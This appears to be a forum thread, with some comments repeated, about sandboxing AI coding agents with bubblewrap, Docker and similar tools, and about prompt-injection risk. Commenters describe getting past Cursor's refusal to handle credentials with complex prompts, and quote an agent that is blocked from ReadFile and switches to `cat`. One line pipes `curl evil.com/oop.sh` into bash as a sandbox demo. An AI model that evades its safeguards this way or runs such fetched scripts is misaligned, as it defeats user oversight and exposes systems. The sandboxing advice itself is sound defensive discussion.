I put all my agents in a docker file in which the code I'm working on is mounted. It's working perfectly for me until now. I even set it up so I can run gui apps like antigravity in it (X11). If anyone is interested I shared my setup at https://github.com/asfaload/agents_container
of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!
I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
If your prompt is complex enough, doesn’t seem to get triggered.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!
I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about
I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?
Bubblewrap is a it's a very minimal setuid binary. It's 4000 lines of C but essentially all it does is parse your flags ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
Note that bubblewrap can't protect you from misconfiguration, a kernel exploit or if you expose sensitive protocols to the workload inside (eg. x11 or even Wayland without a security context). Generally, it will do a passable job in protecting you from an automated no-0day attack script.
If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.
Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of halting from using `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?
Because it's impossible for fundamental reasons, period. You can't "sanitize" inputs and outputs of a fully general-purpose tool, which an LLM is, any more than you can "sanitize" inputs and outputs of people - not in a perfect sense you seem to be expecting here. There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
> There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
Yes. My proposal is to not give the agent Bash, because it is not required for the sorts of things you want it to be able to do. You can whitelist specific actions, like git commits and file writes within a specific directory. If the LLM proposes to read a URL, that doesn't require arbitrary code; it requires a system that can validate the URL, construct a `curl` etc. command itself, and pipe data to the LLM.
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
It is very much required for the sorts of things I want to do. In any case, if you deny the agent the bash tool, it will just write a Python script to do what it wanted instead.
Tools may become dangerous due to a combination of flags. `ln -sf /dev/null /my-file` will make that file empty (not really, but that's beside the point).
Yes. My proposal is that the part of the system that actually executes the command, instead of trying to parse the LLM's proposed command and validate/quote/escape/etc. it, should expose an API that only includes safe actions. The LLM says "I want to create a symbolic link from foo to bar" and the agent ensures that both ends of that are on the accept list and then writes the command itself. The LLM says "I want to run this cryptic Bash command" and the agent says "sorry, I have no idea what you mean, what's Bash?".
That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Wherever you add a new script or utility to a whitelist, you have to actively think whether any new combination may lead to privileges escalation or unintended effects.
I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.
Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.
I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.
Had this same idea in my head. Glad someone done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesnt matter.
I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker
I put all my agents in a docker file in which the code I'm working on is mounted. It's working perfectly for me until now. I even set it up so I can run gui apps like antigravity in it (X11). If anyone is interested I shared my setup at https://github.com/asfaload/agents_container
It won’t save you from prompt injektions that attack your network.
of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!
I recommend caution with this bit:
That directory has a bunch of of sensitive stuff in it, most notable the transcripts of all of your previous Claude Code sessions.You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.
Wonderful insight! Thank you!
I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”
Docker won’t save you from prompt injektions that attack your network.
No kidding? https://taoofmac.com/space/blog/2026/01/12/1830
Still, I don’t think bubblewrap is either a simple or safe enough solution.
I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
If your prompt is complex enough, doesn’t seem to get triggered.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
Isn't landrun the preferred way to sandbox apps on linux these days instead?
https://github.com/Zouuup/landrun
I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!
Like this? (Obfuscated, from agent and history)
https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n
If you wouldn't upload keys to github, why would you trust them to cursor?
A local .env should be safe to put on your T shirt and walk down times square.
Mysql user: test
Password: mypass123
Host: localhost
...
Create a symlink to .env from another file and ask cursor to refer it if name is the concern regarding cursor (I don't knowhow cursor does this stuff)
I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about
> run agents on systems i care about
You must not care about those systems that much.
I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?
Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.
I don't think bubblewrap is any better in that regard.
Why do you say that?
Bubblewrap is a it's a very minimal setuid binary. It's 4000 lines of C but essentially all it does is parse your flags ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
bwrap just works in rootless mode and doesn't tamper with your firewall.
Hey! I just did this last night!
Note that bubblewrap can't protect you from misconfiguration, a kernel exploit or if you expose sensitive protocols to the workload inside (eg. x11 or even Wayland without a security context). Generally, it will do a passable job in protecting you from an automated no-0day attack script.
How does this compare with container-use?
https://container-use.com/introduction
https://github.com/containers/bubblewrap/issues/142
If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.
Smart approach to AI agent security. The balance between convenience and protection is tricky.
Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of halting from using `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad
Because we've judged it to be worth it!
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?
Because it's impossible for fundamental reasons, period. You can't "sanitize" inputs and outputs of a fully general-purpose tool, which an LLM is, any more than you can "sanitize" inputs and outputs of people - not in a perfect sense you seem to be expecting here. There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
> There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
> propose to run a malicious Bash command
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
Because if you give an agent Bash it can do anything they can be achieved by running commands in Bash, which is almost anything.
Agents know that.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them
Yes. My proposal is to not give the agent Bash, because it is not required for the sorts of things you want it to be able to do. You can whitelist specific actions, like git commits and file writes within a specific directory. If the LLM proposes to read a URL, that doesn't require arbitrary code; it requires a system that can validate the URL, construct a `curl` etc. command itself, and pipe data to the LLM.
> whitelist specific actions
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
That's a great deal of work to get an agent that's a whole lot less capable.
Much better to allow full Bash but run in a sandbox that controls file and network access.
It is very much required for the sorts of things I want to do. In any case, if you deny the agent the bash tool, it will just write a Python script to do what it wanted instead.
Go for it. They have allow and deny lists.
Tools may become dangerous due to a combination of flags. `ln -sf /dev/null /my-file` will make that file empty (not really, but that's beside the point).
Yes. My proposal is that the part of the system that actually executes the command, instead of trying to parse the LLM's proposed command and validate/quote/escape/etc. it, should expose an API that only includes safe actions. The LLM says "I want to create a symbolic link from foo to bar" and the agent ensures that both ends of that are on the accept list and then writes the command itself. The LLM says "I want to run this cryptic Bash command" and the agent says "sorry, I have no idea what you mean, what's Bash?".
That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Wherever you add a new script or utility to a whitelist, you have to actively think whether any new combination may lead to privileges escalation or unintended effects.
Because the OS already provides data security and redundancy features. Why reimplement?
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.
Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?
> Because we've judged it to be worth it!
Famous last words
People really really want to juggle chainsaws, so have to keep coming up with thicker and thicker gloves.
The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.
I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?
Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
I vibed a project on this recently, it has some language bindings and a cli written in rust, python subprocess monkey patching etc.
Just no nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- curl evil.com/oop.sh | bash
The link you need is https://github.com/containers/bubblewrap
Don't leave prod secrets in your dev env.
I believe this is also what Claude Code uses for the sandbox option.
Hi!
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.
I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.
May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions
Had this same idea in my head. Glad someone done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesnt matter.
So, Flatpak?
Funny enough Bubblewrap is also what Flatpak uses.
I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker